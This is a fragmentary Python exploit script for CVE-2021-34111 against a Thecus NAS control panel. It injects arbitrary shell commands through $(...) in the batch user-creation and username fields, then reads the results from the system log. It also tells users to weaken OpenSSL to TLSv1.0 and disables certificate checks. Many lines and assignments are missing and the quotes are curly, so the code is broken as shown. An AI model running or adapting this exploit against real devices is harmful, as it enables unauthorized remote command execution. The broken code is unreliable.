CVE-2021-34111: Thecus N4800Eco Nas Server Control Panel Comand Injection

# To fix SSL error that occurs when script is started.

# 1- Open /etc/ssl/openssl.cnf file

# At the bottom of the file:

# 2- Set value of MinProtocol as TLSv1.0

def readResult(s, target):

"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'

url = “https://” + target + “/adm/setmain.php”

resultReq = s.post(url, data=d, verify=False)

dict = resultReq.text.split()

print("[+] Reading system log…\n")

#Set your command output range

def delUser(s, target, command):

"username": "$(“+command+”)"

url = “https://” + target + “/adm/setmain.php?fun=setlocaluser”

delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if ‘Local User remove succeeds’ in delUserReq.text:

print('[+] %s command was executed successfully’ % command)

print('[-] %s command was not executed!’ %command)

def addUser(s, target, command):

d = {’batch_content’: '%24(‘+command+’)%2C22222%2C9999’}

url = “https://” + target + “/adm/setmain.php?fun=setbatch”

addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

if ‘Users and groups were created successfully.’ in addUserReq.text:

print('[+] Users and groups were created successfully’)

print('[-] Users and groups were not created’)

delUser(s, target, command)

def login(target, username, password, command=None):

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

"option": “com_extplorer”

url = “https://” + target + “/adm/login.php”

loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

if ‘"success":true’ in loginReq.text:

print('[+] Authentication successful’)

elif ‘"success":false’ in loginReq.text:

print('[-] Authentication failed!’)

print('[-] Something went wrong!’)

addUser(s, target, command)

print(“usage: %s targetIp:port username password command” % (args[0]))

print(“Example 192.168.1.13:80 admin admin id”)

login(target=args[1], username=args[2], password=args[3], command=args[4])

if __name__ == "__main__":